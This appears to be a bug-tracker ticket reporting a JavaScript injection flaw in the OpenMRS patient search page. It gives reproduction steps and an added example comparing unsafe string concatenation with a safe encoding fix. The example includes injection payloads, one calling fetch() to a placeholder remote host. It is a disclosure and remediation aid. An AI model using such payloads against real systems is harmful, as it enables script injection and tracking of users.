Type: Technical task
Affects Version/s: None
Fix Version/s: None
Sprint: Ref App 2.11 Release Sprint 3, Ref App 2.12 Priorities
Patient names aren't escaped before being inserted into JavaScript that the patient search page generates. This is a serious vulnerability; a malicious user could do the following (only one of the scenarios that I could think of). These are also the steps to reproduce:
1. Login to devtest02 or another recent installation
2. Create a new patient. Fill in all other fields normally, but set the first name to |"); Bob| (take everything between the |'s)
This is only one terrible thing one could do with this vulnerability. A person could also, conceivably, log users' IP addresses by sending a request to a remote URL from the injected script. The only limit is the 50-character limit on the field.
Here's how it breaks the patient search page:
Normally, the page generates a script like this to add each patient:
However, since the full name isn't sanitized before being put into the code, we can craft a string that makes this happen:
Which isn't valid JS, and causes an Uncaught SyntaxError: Unexpected token ). This then breaks the entire patient search page.
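Added example (not OpenMRS code) that reproduces the failure mode above and shows the fix. It simulates the server-side generation of the per-patient inline script with plain string concatenation next to a version that encodes the name as a JavaScript string literal. The function name addPatient, the payloads, and the use of a single name field are assumptions for illustration; the browser's parsing step is simulated with new Function so nothing from the payload is ever executed.

```javascript
// Added example, not code from the OpenMRS Reference Application.
// Assumed shape of the generated per-patient script: addPatient("<name>");

// Vulnerable rendering: the name is concatenated straight into JS source.
function renderUnsafe(name) {
  return 'addPatient("' + name + '");';
}

// Encode an arbitrary string as a JS string literal that is safe inside an
// inline <script>: JSON.stringify escapes quotes, backslashes and control
// characters; the extra replacements keep '</script>' from closing the script
// element and escape U+2028/U+2029, which some engines treat as line terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened rendering: the name can only ever be a string argument.
function renderSafe(name) {
  return 'addPatient(' + jsStringLiteral(name) + ');';
}

// Parse a generated script the way the browser would, without running it.
// Returns null when the script is syntactically valid, else the SyntaxError.
function parseError(script) {
  try {
    new Function(script);
    return null;
  } catch (e) {
    return e;
  }
}

// Execute a generated script with a stub addPatient and return the names it
// registered, to check that the hardened version preserves the name exactly.
// Only call this on scripts produced by renderSafe.
function runWithStub(script) {
  const seen = [];
  new Function('addPatient', script)(function (n) { seen.push(n); });
  return seen;
}

// Constructed payloads (assumptions for illustration, not data from the report).
// The first is the name from the reproduction steps above; the second, under
// 50 characters, is the kind of payload that calls out to a remote URL.
const BREAKING_NAME = '"); Bob';
const EXFIL_NAME = '"); fetch("//example.invalid/"); ("';

// Summarise the outcome of both renderings for both payloads.
function demo() {
  return {
    unsafeBreaks: parseError(renderUnsafe(BREAKING_NAME)) instanceof SyntaxError,
    unsafeRunsAttackerCode: parseError(renderUnsafe(EXFIL_NAME)) === null,
    safeParses: parseError(renderSafe(BREAKING_NAME)) === null,
    safeKeepsNameAsData: runWithStub(renderSafe(EXFIL_NAME))[0] === EXFIL_NAME,
  };
}
```

With the concatenated version the breaking name yields a script that fails to parse (the symptom described above), while the remote-URL payload parses cleanly and would run as page code. With jsStringLiteral both payloads survive only as the string argument to addPatient. The same encoding should be applied to every field that ends up inside a script block, not just the first name.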